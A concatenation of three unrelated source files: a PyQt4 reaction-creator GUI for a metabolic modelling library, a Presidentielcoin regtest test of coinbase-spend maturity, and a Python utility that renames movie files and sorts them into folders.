def addProduct(self, coeff, sid):
self.tblProd.insertRow(self.tblProdRow)
self.tblProd.setItem(self.tblProdRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblProd.setItem(self.tblProdRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblProd.item(self.tblProdRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblProd.item(self.tblProdRow, 1).setForeground(self._fixColour)
self.tblProd.item(self.tblProdRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblProdRow += 1
def addSelectedProducts(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstProd.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newProds:
self.addProduct(1, i_)
self._newProds.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Product(s) added')
self.checkBalance()
# def keyPressEvent(self, event):
#print('KeyPress key: {}'.format(str(event.key())))
# if event.key() == 16777223:
#print('You pressed the delete key')
def deleteSubstrates(self):
self.deleteReagents('substrate')
def deleteProducts(self):
self.deleteReagents('product')
def deleteAllSubstrates(self):
self.tblSub.clear()
for r_ in range(self.tblSubRow - 1, -1, -1):
self.tblSub.removeRow(r_)
self.tblSubRow = 0
self.checkBalance()
def deleteAllProducts(self):
self.tblProd.clear()
for r_ in range(self.tblProdRow - 1, -1, -1):
self.tblProd.removeRow(r_)
self.tblProdRow = 0
self.checkBalance()
def deleteReagents(self, reagentType):
selected = None
PRODACTIVE = False
SUBACTIVE = False
self.IGNORECHECK = True
if reagentType == 'substrate':
selected = [(it_.row(), it_.column()) for it_ in self.tblSub.selectedItems()]
SUBACTIVE = True
elif reagentType == 'product':
selected = [(it_.row(), it_.column()) for it_ in self.tblProd.selectedItems()]
PRODACTIVE = True
if selected != None:
deleteRow = []
if len(selected) == 2:
if selected[0][0] == selected[1][0]:
if selected[0][1] + 1 == selected[1][1]:
deleteRow.append(selected[0][0])
elif len(selected) > 2:
for it_ in range(0, len(selected), 2):
if selected[it_][1] == selected[it_ + 1][1]:
if selected[it_][0] + 1 == selected[it_ + 1][0]:
if selected[it_][0] not in deleteRow:
deleteRow.append(selected[it_][0])
if selected[it_][0] + 1 not in deleteRow:
deleteRow.append(selected[it_][0] + 1)
deleteRow.sort()
for d_ in range(len(deleteRow) - 1, -1, -1):
if SUBACTIVE:
print('Deleting Sub table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Substrate(s) deleted')
# print(self._newSubs)
#print(str(self.tblSub.item(d_, 1).text()))
self._newSubs.pop(self._newSubs.index(str(self.tblSub.item(d_, 1).text())))
self.tblSub.removeRow(deleteRow[d_])
self.tblSubRow -= 1
elif PRODACTIVE:
print('Deleting Prod table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Product(s) deleted')
# print(self._newProds)
#print(str(self.tblProd.item(d_, 1).text()))
self._newProds.pop(self._newProds.index(str(self.tblProd.item(d_, 1).text())))
self.tblProd.removeRow(deleteRow[d_])
self.tblProdRow -= 1
self.IGNORECHECK = False
self.checkBalance()
def checkBalance(self):
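        # Accumulate signed element counts from the substrate and product chemical
        # formulas: 'output' holds the net per-element imbalance, 'left'/'right'
        # the per-side totals shown in the balance table.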
if self.IGNORECHECK:
return
output = {}
left = {}
right = {}
for r_ in range(self.tblSubRow):
sid = str(self.tblSub.item(r_, 1).text())
scoef = float(str(self.tblSub.item(r_, 0).text()))
# print scoef
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
output[e_[0]] = output[e_[0]] + -scoef * float(e_[1])
# print scoef*float(e_[1])
else:
output[e_[0]] = -scoef * float(e_[1])
# print scoef*float(e_[1])
if e_[0] in left:
left[e_[0]] = left[e_[0]] + scoef * float(e_[1])
else:
left[e_[0]] = scoef * float(e_[1])
for r_ in range(self.tblProdRow):
sid = str(self.tblProd.item(r_, 1).text())
pcoef = float(str(self.tblProd.item(r_, 0).text()))
# print pcoef, type(pcoef)
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
#print -pcoef*float(e_[1])
output[e_[0]] = output[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
output[e_[0]] = pcoef * float(e_[1])
if e_[0] in right:
#print -pcoef*float(e_[1])
right[e_[0]] = right[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
right[e_[0]] = pcoef * float(e_[1])
# print output
self.updateBalance(output, left, right)
# self.txtBal.setText(str(output))
def updateBalance(self, bdict, left, right):
colHead = []
keys = list(bdict)
if self.tblBalCol > 0:
for c_ in range(self.tblBalCol - 1, -1, -1):
self.tblBal.removeColumn(c_)
self.tblBalCol = 0
self.ISBALANCED = True
for k_ in range(len(keys)):
if not keys[k_] in left:
left[keys[k_]] = 'None'
if not keys[k_] in right:
right[keys[k_]] = 'None'
self.tblBalCol += 1
self.tblBal.insertColumn(k_)
self.tblBal.setItem(0, k_, QtGui.QTableWidgetItem('{}'.format(abs(bdict[keys[k_]]))))
self.tblBal.setItem(1, k_, QtGui.QTableWidgetItem('{}'.format(left[keys[k_]])))
self.tblBal.setItem(2, k_, QtGui.QTableWidgetItem('{}'.format(right[keys[k_]])))
self.tblBal.item(0, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if k_ == 0:
boldFont = self.tblBal.item(0, k_).font()
boldFont.setBold(True)
self.tblBal.item(0, k_).setFont(boldFont)
self.tblBal.item(1, k_).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblBal.item(2, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if bdict[keys[k_]] != 0.0:
self.ISBALANCED = False
self.tblBal.item(0, k_).setForeground(self._errColour)
else:
self.tblBal.item(0, k_).setForeground(self._goodColour)
self.tblBal.setHorizontalHeaderLabels(QtCore.QStringList(keys))
def showErrorMessage(self, errorMsg, title="Reaction Creator"):
QtGui.QMessageBox.critical(None, title,
errorMsg,
QtGui.QMessageBox.Ok | QtGui.QMessageBox.Default,
QtGui.QMessageBox.NoButton)
self.statusBar.showMessage(errorMsg)
def getNewReaction(self):
reversible = self.btReverse.isChecked()
if not reversible and self._Blower == '-inf':
self._Blower = 0.0
Id = str(self.txtId.toPlainText()).strip()
Name = str(self.txtNm.toPlainText()).strip()
if Id == 'NewReactionId':
print('\nWARNING: using default reaction id')
errorMsg = None
if Id == "":
errorMsg = 'Reaction ID must be specified.'
elif Id in self._rlist:
errorMsg = 'Reaction ID \"{}\" already exists.'.format(Id)
if errorMsg != None:
self.showErrorMessage(errorMsg)
self.NewReaction = None
return None
if self.tblSubRow == 0 and self.tblProdRow == 0:
self.showErrorMessage('At least one reagent must be defined.')
self.NewReaction = None
return None
#print('\nid=\"{}\"\nname=\"{}\"'.format(Id, Name))
# print self.tblSub.rowCount(), self.tblSubRow
# print self.tblProd.rowCount(), self.tblProdRow
Reag = {}
exReac = False
for s_ in range(self.tblSub.rowCount()):
coeff = -abs(float(self.tblSub.item(s_, 0).text()))
Sid = str(self.tblSub.item(s_, 1).text()).strip()
if Sid in self._flist:
exReac = True
Reag[Sid] = coeff
for p_ in range(self.tblProd.rowCount()):
coeff = abs(float(self.tblProd.item(p_, 0).text()))
Sid = str(self.tblProd.item(p_, 1).text()).strip()
if Sid in self._flist:
exReac = True
if Sid in Reag:
Reag[Sid] += coeff
else:
Reag[Sid] = coeff
for r_ in tuple(Reag):
if Reag[r_] == 0.0:
Reag.pop(r_)
print('removing zero coefficient reagent: {}'.format(r_))
self.NewReaction = {'reversible': reversible,
'id': Id,
'name': Name,
'is_exchange': exReac,
'is_balanced': self.ISBALANCED,
'reagents': Reag,
'upper_bound': self._Bupper,
'lower_bound': self._Blower
}
sub = ''
prod = ''
for r_ in Reag:
coeff = abs(Reag[r_])
if Reag[r_] < 0.0:
if coeff == 1.0:
sub += '%s + ' % (r_)
else:
sub += '{%s} %s + ' % (coeff, r_)
else:
if coeff == 1.0:
prod += '%s + ' % (r_)
else:
prod += '{%s} %s + ' % (coeff, r_)
if reversible:
eq = '%s\n\t%s\n%s' % (sub[:-3], '<==>', prod[:-2])
else:
eq = '%s\n\t%s\n%s' % (sub[:-3], '-->', prod[:-2])
#quit_msg = "Add reaction:\n\n{}\n\t{}\n{}".format(sub,rev,prod)
quit_msg = eq
reply = QtGui.QMessageBox.question(self, 'Do you want to add the reaction \"{}\" to the model?'.format(Id),
quit_msg, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
self.statusBar.showMessage('Reaction {} added to model'.format(Id))
print(self.NewReaction)
QtGui.qApp.quit()
else:
print('Try again')
self.NewReaction = None
def initUI(self):
# create labels
lblSub = QtGui.QLabel('Substrates')
lblSub.setAlignment(QtCore.Qt.AlignCenter)
lblProd = QtGui.QLabel('Products')
lblProd.setAlignment(QtCore.Qt.AlignCenter)
lblId = QtGui.QLabel('Reaction id')
lblId.setAlignment(QtCore.Qt.AlignCenter)
lblNm = QtGui.QLabel('Reaction name')
lblNm.setAlignment(QtCore.Qt.AlignCenter)
# create text boxes
self.txtId = QtGui.QTextEdit()
self.txtId.setMaximumHeight(25)
self.txtId.setText('NewReactionId')
self.txtNm = QtGui.QTextEdit()
self.txtNm.setMaximumHeight(25)
self.txtNm.setText('NewReactionName')
self.txtBal = QtGui.QTextEdit()
self.txtBal.setMaximumHeight(40)
# create static lists
self.lstSub = QtGui.QListWidget()
self.lstSub.setSelectionMode(self.lstSub.ExtendedSelection)
self.lstProd = QtGui.QListWidget()
self.lstProd.setSelectionMode(self.lstProd.ExtendedSelection)
# populate lists
cntr = 0
for m_ in self._mlist:
cntr += 1
name = 'None'
comp = 'None'
if m_ in self._ccdict:
comp = self._ccdict[m_]
if m_ in self._cndict:
name = self._cndict[m_]
item = QtGui.QListWidgetItem(m_)
item.setToolTip('{}\t{}'.format(name, comp))
if m_ in self._flist:
item.setForeground(self._fixColour)
self.lstSub.addItem(item.clone())
self.lstProd.addItem(item)
# if cntr == 20: break
# create buttons
self.btAddSub = QtGui.QPushButton('Add substrate(s)')
QtCore.QObject.connect(self.btAddSub, QtCore.SIGNAL('clicked()'), self.addSelectedSubstrates)
self.btAddProd = QtGui.QPushButton('Add product(s)')
QtCore.QObject.connect(self.btAddProd, QtCore.SIGNAL('clicked()'), self.addSelectedProducts)
self.btReverse = QtGui.QPushButton('Reversible')
self.btReverse.setCheckable(True)
self.btReverse.setChecked(True)
# create tables
self.tblSub = QtGui.QTableWidget()
self.tblSub.setSortingEnabled(True)
self.tblSub.insertColumn(0)
self.tblSub.insertColumn(1)
self.tblSub.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblSub.verticalHeader().setVisible(False)
QtCore.QObject.connect(self.tblSub, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblSubRow = 0
self.tblProd = QtGui.QTableWidget()
self.tblProd.setSortingEnabled(True)
self.tblProd.insertColumn(0)
self.tblProd.insertColumn(1)
self.tblProd.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblProd.verticalHeader().setVisible(False)
self.tblProdRow = 0
QtCore.QObject.connect(self.tblProd, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblBal = QtGui.QTableWidget()
self.tblBal.setMaximumHeight(150)
self.tblBal.insertRow(0)
self.tblBal.insertRow(1)
self.tblBal.insertRow(2)
self.tblBal.verticalHeader().setVisible(False)
self.tblBalCol = 0
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
addReAction = QtGui.QAction('&Add reaction and exit', self)
addReAction.setShortcut('Ctrl+A')
addReAction.setStatusTip('Add reaction to model and exit')
addReAction.triggered.connect(self.getNewReaction)
fileMenu = menuBar.addMenu('&Model')
fileMenu.addAction(exitAction)
fileMenu.addAction(addReAction)
subAddAction = QtGui.QAction('&Add', self)
subAddAction.triggered.connect(self.addSelectedSubstrates)
subDelAction = QtGui.QAction('&Delete selected', self)
subDelAction.triggered.connect(self.deleteSubstrates)
subDelAllAction = QtGui.QAction('&Delete all', self)
subDelAllAction.triggered.connect(self.deleteAllSubstrates)
subMenu = menuBar.addMenu('&Substrate')
subMenu.addAction(subAddAction)
subMenu.addAction(subDelAction)
subMenu.addAction(subDelAllAction)
prodAddAction = QtGui.QAction('&Add', self)
prodAddAction.triggered.connect(self.addSelectedProducts)
prodDelAction = QtGui.QAction('&Delete selected', self)
prodDelAction.triggered.connect(self.deleteProducts)
prodDelAllAction = QtGui.QAction('&Delete all', self)
prodDelAllAction.triggered.connect(self.deleteAllProducts)
prodMenu = menuBar.addMenu('&Product')
prodMenu.addAction(prodAddAction)
prodMenu.addAction(prodDelAction)
prodMenu.addAction(prodDelAllAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('{} ready'.format('Model'))
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.statusBar, 0, 2, 1, 2)
grid.addWidget(lblId, 1, 0)
grid.addWidget(self.txtId, 1, 1)
grid.addWidget(lblNm, 1, 2)
grid.addWidget(self.txtNm, 1, 3)
grid.addWidget(lblSub, 2, 0, 1, 2)
grid.addWidget(lblProd, 2, 2, 1, 2)
grid.addWidget(self.lstSub, 3, 0, 1, 2)
grid.addWidget(self.lstProd, 3, 2, 1, 2)
grid.addWidget(self.btAddSub, 4, 0)
grid.addWidget(self.btReverse, 4, 1, 1, 2)
grid.addWidget(self.btAddProd, 4, 3)
grid.addWidget(self.tblSub, 5, 0, 1, 2)
grid.addWidget(self.tblProd, 5, 2, 1, 2)
grid.addWidget(self.tblBal, 6, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle('Reaction Creator')
self.show()
def createReaction(mod):
"""
Create a reaction using the graphical Reaction Creator
- *mod* a CBMPy model object
"""
cfdict = {}
cndict = {}
ccdict = {}
for s_ in mod.species:
cfdict[s_.getId()] = s_.getChemFormula()
cndict[s_.getId()] = s_.getName()
ccdict[s_.getId()] = s_.compartment
app = QtGui.QApplication([])
ex = ReactionCreator(mod.getReactionIds(), mod.getSpeciesIds(), mod.getBoundarySpeciesIds(), cfdict, cndict, ccdict)
app.exec_()
newR = ex.NewReaction
del app, ex
if newR == None:
return None
else:
R = CBMReaction(newR['id'], name=newR['name'], reversible=newR['reversible'])
R.is_balanced = newR['is_balanced']
R.is_exchange = newR['is_exchange']
for r_ in newR['reagents']:
R.createReagent(r_, newR['reagents'][r_])
mod.getSpecies(r_).setReagentOf(newR['id'])
mod.addReaction(R, create_default_bounds=False)
mod.createReactionLowerBound(newR['id'], newR['lower_bound'])
mod.createReactionUpperBound(newR['id'], newR['upper_bound'])
return R
class CBFileDialogue(QtGui.QWidget):
_appTitle = 'Open file'
work_dir = None
model_file = None
mode = None
def __init__(self, work_dir, mode='open', filters=None):
super(CBFileDialogue, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.mode = mode
if mode == 'save':
self._appTitle = 'Save file'
self.initUI()
def initUI(self):
#self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
# self.setHidden(True)
self.__dlg__ = QtGui.QFileDialog(self)
if self.mode == 'open':
#self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir))
elif self.mode == 'save':
#self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir))
self.model_file = os.path.normpath(self.model_file)
def fileDialogue(work_dir=None, mode='open', filters=None):
if work_dir == None:
work_dir = os.getcwd()
if mode in ['open', 'save']:
app = QtGui.QApplication([])
fileApp = CBFileDialogue(work_dir, mode=mode, filters=filters)
model_file = fileApp.model_file
fileApp.__dlg__.done(1)
app.exit()
if mode == 'open':
return model_file
else:
return True
class ViewSVG(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ViewSVG'
def __init__(self, filename):
super(ViewSVG, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.filename = os.path.abspath(filename)
print('\nViewing file: {}'.format(filename))
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# webkit panel
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem(self.filename).boundingRect()
webview = QGraphicsWebView()
# webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile(self.filename)))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width() + 10, br.height() + 10)
# view.show()
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(view, 1, 0, 4, 4)
grid.addWidget(self.statusBar, 5, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadViewSVG(filename):
app = QtGui.QApplication([])
ex = ViewSVG(filename)
app.exec_()
class ValueSlider(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ValueSlider'
def __init__(self):
super(ValueSlider, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def initUI(self):
# create panels
#self.txtId = QtGui.QTextEdit()
l1a = QtGui.QLabel(self)
l1a.setText('Property')
sld1 = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld1.setTickPosition(sld1.TicksBelow)
sld1_min = -100
sld1_max = 100
sld1.setMinimum(sld1_min)
sld1.setMaximum(sld1_max)
        sld1.setTickInterval((sld1_max - sld1_min) / 10.0)
sld1.setSingleStep(0.1)
sld1.setFocusPolicy(QtCore.Qt.NoFocus)
sld1.valueChanged[int].connect(self.changeValue)
self.l1b = QtGui.QLabel(self)
self.l1b.setText('0.0')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(l1a, 0, 0, 1, 1)
grid.addWidget(self.l1b, 0, 1, 1, 1)
grid.addWidget(sld1, 0, 2, 1, 5)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
#grid.addWidget(menuBar, 0, 0)
#grid.addWidget(self.statusBar, 0, 1)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 280, 170)
self.setWindowTitle(self._appTitle)
self.show()
def changeValue(self, value):
getattr(self, 'l1b').setText('{}'.format(value))
def loadSlider():
app = QtGui.QApplication([])
ex = ValueSlider()
app.exec_()
data = "<DATASTART><return>{}</return>"
if __name__ == '__main__':
print(os.sys.argv)
if os.sys.argv[1] == 'fileOpen':
filename = fileDialogue(work_dir=None, mode='open', filters=None)
print(data.format(filename))
os.sys.exit(0)
# subprocess.check_output(['python', '_qtloader.py', 'fileOpen']).split('<DATASTART>')[1].strip()
# template widget
"""
class SmallAppBasicGrid(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'SmallAppBaseGrid'
def __init__(self):
super(SmallAppBasicGrid, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0,0,153,alpha=255)
self._errColour = QtGui.QColor(255,0,0,alpha=255)
self._goodColour = QtGui.QColor(0,100,0,alpha=255)
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(self.statusBar, 2, 0, 1, 2)
self.setLayout(grid)
self.setGeometry(self.mousePos.x()-75, self.mousePos.y()-75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadBasicApp(mod):
app = QtGui.QApplication([])
ex = SmallAppBasicGrid()
app.exec_()
"""
# template microGUI
"""
class MicroGUI(QtGui.QWidget):
_appTitle = 'MicroGUI'
def __init__(self):
super(MicroGUI, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.initUI()
def initUI(self):
self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
self.setHidden(True)
# action code (this example is for opening a file dialogue)
self.model_file = str(QtGui.QFileDialog.getOpenFileName(self, 'Open file', os.getcwd()))
def loadMicroGUI(*args):
app = QtGui.QApplication([])
    mGUI = MicroGUI()
appTitle = mGUI._appTitle
del mGUI, app
return
"""
"""
import sys
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem("C:\your_interactive_svg.svg").boundingRect()
webview = QGraphicsWebView()
webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile("C:\your_interactive_svg.svg")))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width()+10, br.height()+10)
view.show()
sys.exit(app.exec_())
"""
| gpl-3.0 | 6,245,848,769,703,354,000 | 35.823864 | 148 | 0.568523 | false |
presidentielcoin/presidentielcoin | qa/rpc-tests/mempool_spendcoinbase.py | 1 | 2498 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Presidentielcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test spending coinbase transactions.
# The coinbase transaction in block N can appear in block
# N+100... so is valid in the mempool when the best block
# height is N+99.
# This test makes sure coinbase spends that will be mature
# in the next block are accepted into the memory pool,
# but less mature coinbase spends are NOT.
#
from test_framework.test_framework import PresidentielcoinTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolSpendCoinbaseTest(PresidentielcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def run_test(self):
chain_height = self.nodes[0].getblockcount()
assert_equal(chain_height, 200)
node0_address = self.nodes[0].getnewaddress()
# Coinbase at height chain_height-100+1 ok in mempool, should
        # get mined. Coinbase at height chain_height-100+2
        # is too immature to spend.
b = [ self.nodes[0].getblockhash(n) for n in range(101, 103) ]
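        # b holds the hashes of blocks 101 and 102: the coinbase of block 101
        # matures at height 201 (the next block), the one of block 102 only at 202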
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.99) for txid in coinbase_txids ]
spend_101_id = self.nodes[0].sendrawtransaction(spends_raw[0])
# coinbase at height 102 should be too immature to spend
assert_raises(JSONRPCException, self.nodes[0].sendrawtransaction, spends_raw[1])
# mempool should have just spend_101:
assert_equal(self.nodes[0].getrawmempool(), [ spend_101_id ])
# mine a block, spend_101 should get confirmed
self.nodes[0].generate(1)
assert_equal(set(self.nodes[0].getrawmempool()), set())
# ... and now height 102 can be spent:
spend_102_id = self.nodes[0].sendrawtransaction(spends_raw[1])
assert_equal(self.nodes[0].getrawmempool(), [ spend_102_id ])
if __name__ == '__main__':
MempoolSpendCoinbaseTest().main()
| mit | 8,169,746,611,444,227,000 | 38.650794 | 104 | 0.670937 | false |
hgibs/cinefiles | src/cinefiles/cinefolders.py | 1 | 6051 | #! /usr/bin/env python3
import logging
import shutil
from shutil import copy2, move
from os import path, scandir, makedirs
import os
from sys import maxsize
from guessit import guessit
import configparser
from .cinefiles import Cinefiles
# from guessit import guessit
#
# defaultPath = "/Volumes/Holland Gibson Ext HDD/Movies/Movies"
# path = input("What folder contains the movies you want to rename/place
# in folders?\n("+defaultPath+"): ")
class Cinefolders:
def __init__(self, *args, **kwargs):
self.configdict = { 'configfile':'',
'dirpath':'',
'srcpath':'',
'copy':True,
'limit':maxsize,
}
for k in kwargs:
if k not in self.configdict:
print(k+" isn't a valid key")
if('configfile' in kwargs):
self.configdict.update({'configfile':kwargs['configfile']})
self.readconfigs(kwargs['configfile'])
elif(len(kwargs)==0):
defaultconfig = 'cinefiles.ini'
print("No arguments specified, searching for "+defaultconfig)
self.configdict.update({'configfile':defaultconfig})
self.readconfigs(defaultconfig)
else:
if('folder' in kwargs):
self.configdict.update({'dirpath':kwargs['folder']})
def readconfigs(self, file):
config = configparser.ConfigParser()
if path.exists(file):
config.read(file)
else:
print('Config file not found!!')
exit()
if 'cinefolders' not in config:
print( "You must have a [cinefolders] section in the"
+"config file!!!")
exit()
conf = config['cinefolders']
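        # every option falls back to a safe default, so a minimal config file
        # still works (copy everything, no limit on the number of movies)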
folder = conf.get('mainfolder',fallback='')
self.configdict.update({'dirpath':folder})
srcfolder = conf.get('source_folder',fallback='')
self.configdict.update({'srcpath':srcfolder})
copy_flag = conf.getboolean('copy',fallback=True)
self.configdict.update({'copy':copy_flag})
numlimit = conf.getint('max_number',fallback=maxsize)
self.configdict.update({'limit':numlimit})
# print(self.configdict)
def organizefolder(self):
folder = self.configdict['dirpath']
self.moveintofolders(src=folder, copy=False)
# def renameexisting(self):
# folders = scandir(src)
# for item in folders:
# if(item.is_folder()):
# if(not item.name.startswith('.')):
#
def fixname(self, en):
i_info = guessit(en.name)
# newName = i_info['title'].lower()
name = i_info['title']
words = name.split(' ')
newName = ''
skips = ['a','an','the','and','but','or','for','nor','on','at',
'to','from','by']
punctuation = [',','?','!','.',';',':']
for w in words:
addpunctuation = ''
if(w[-1] in punctuation):
addpunctuation = w[-1]
w=w[:-1]
if(w.lower() not in skips):
newName += w.title()+' '+addpunctuation
#make sure first and last word is capitalized
words2 = newName.split(' ')
words2[0] = words2[0].title()
words2[-1] = words2[-1].title()
newName = ''
for w in words2:
newName += w+' '
newName = newName.strip()
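        # move a leading article to the end for library-style sorting,
        # e.g. 'The Matrix (1999)' becomes 'Matrix, The (1999)'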
if(newName[0:4].lower() == 'the '):
newName = newName[4:]
newName += ', The '
# newName = newName.title()
if('year' in i_info):
year = str(i_info['year'])
newName = newName.strip()+' ('+year+')'
return newName
def moveintofolders(self,src=None, limit=None, copy=None):
if(src==None):
src=self.configdict['srcpath']
if(limit==None):
limit=self.configdict['limit']
if(copy==None):
copy=self.configdict['copy']
dirpath = self.configdict['dirpath']
# print(dirpath)
if not path.exists(dirpath):
raise NotADirectoryError(dirpath+" does not exist")
# fixedpath = path.replace('\\','').rstrip()
list = scandir(src)
num = 0
same_folder = (src==dirpath)
# if(not copy and not same_folder):
# confirmtxt = ""
# while(not (confirmtxt=="yes" or confirmtxt=="no")):
# confirmtxt = input(
# "I highly reccomend you copy movies first, if you "
# +"don't want an error to delete or corrupt your "
# +"movies. Are you sure you want to proceed with "
# +"moving movies into folders? (yes or no) ")
# confirmtxt = confirmtxt.lower()
# if(not (confirmtxt=="yes" or confirmtxt=="no")):
# print("Please enter 'yes' or 'no'")
for item in list:
if(item.is_file() and num<=limit):
if(not item.name.startswith('.')):
newName = self.fixname(item)
print('Copying to '+newName)
logging.info(newName)
if(not os.path.exists(dirpath+'/'+newName)):
makedirs(dirpath+'/'+newName)
if(copy):
copy2(item.path, dirpath+'/'+newName+'/'+item.name)
else:
move(item.path, dirpath+'/'+newName+'/'+item.name)
num+=1
if(copy):
returnstmt = str(num)+" movies copied into better-named folders."
else:
returnstmt = str(num)+" movies moved into better-named folders."
print(returnstmt)
